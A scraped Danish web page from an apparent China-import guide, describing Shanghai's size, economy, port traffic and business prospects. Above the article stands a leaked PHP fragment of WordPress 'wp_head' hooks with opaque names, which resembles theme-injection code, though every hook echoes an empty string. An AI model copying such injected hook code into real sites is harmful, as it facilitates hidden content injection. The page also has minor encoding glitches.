add_action("wp_head", "wpinfoaj2"); function wpinfoaj2(){ echo ""; } add_action("wp_head", "wpinfoaj5"); function wpinfoaj5(){ echo ""; } add_action("wp_head", "wpinfoaj6"); function wpinfoaj6(){ echo ""; }add_action("wp_head", "wpinfoaj1"); function wpinfoaj1(){ echo ""; }

Shanghai – Kina handelscentrum | Kina Import Guiden
Kina Import Guiden - Kina Import Guiden – om at importere fra Kina, handel med Kina og produktion i Kina. Læs her inden du starter en kina butik eller webshop med kina varer.

Shanghai – Kina handelscentrum

Shanghai får mere og mere opmærksomhed fra hele verden og er et hurtigt voksende internationalt metropol. Shanghai er med sine mere end 23 milioner mennesker den største by i Kina. Shanghai ligger i mundingen af ??Yangtze-floden, har to internationale lufthavne og er den mest indflydelsesrige økonomiske, handelsby i det østlige Kina med fokus på kultur, videnskab og teknologi. Shanghai er også blevet et populært turistmål, hvor man som besøgende kan fornemme den pulserende udvikling af det moderne Kina.

Som andre voksende storbyer i Kina, kommer bønderne fra landet ind til Shanghai for at søge lykken, ved at starte en lille forretning, finde arbejde på restaurant eller som husholderske eller lignende, hvilket er en af grundende til at Shanghai også i areal udvider heletiden. Der bygges nye ejendomme, nye butikker og storcentre overalt i Shanghai. Det er en spændende udvikling, og alle døre står åbne i storbyen Shanghai.

Mange vestlige kommer også rejsende til Shanghai, for at give sig i kast med Kina produktion, Kina import eller handel. Nogen kommer til Shanghai med en god ide, på noget som findes i vesten, men endnu ikke i Kina, og så er mulighederne store for at finde samarbejdspartner i Shanghai og starte en produktion op. Andre kommer for at videreudvikle en allerede eksisterende forretning i vesten, eller for at få forretningen ind på det kinesiske marked. Og mange kommer for at se, hvad der findes i Kina, hvad er muligt, hvad er priserne og for at finde gode kontakter.

Shanghai har været en af de hurtigst udviklende byer i verden igennem de sidste to årtier. Shanghai’s samlede BNP er 1920 milliarder RMB. De tre største arbejdsområder i Shanghai er finansielle virksomheder, tjenesteydelser, detailhandel og fast ejendom.

Shanghai har verdens travleste containerhavn, der håndterer omkring 29.05 millioner TEU om året. Shanghai er dermed på vej til at blive et internationalt skibsfart center i den nærmeste fremtid.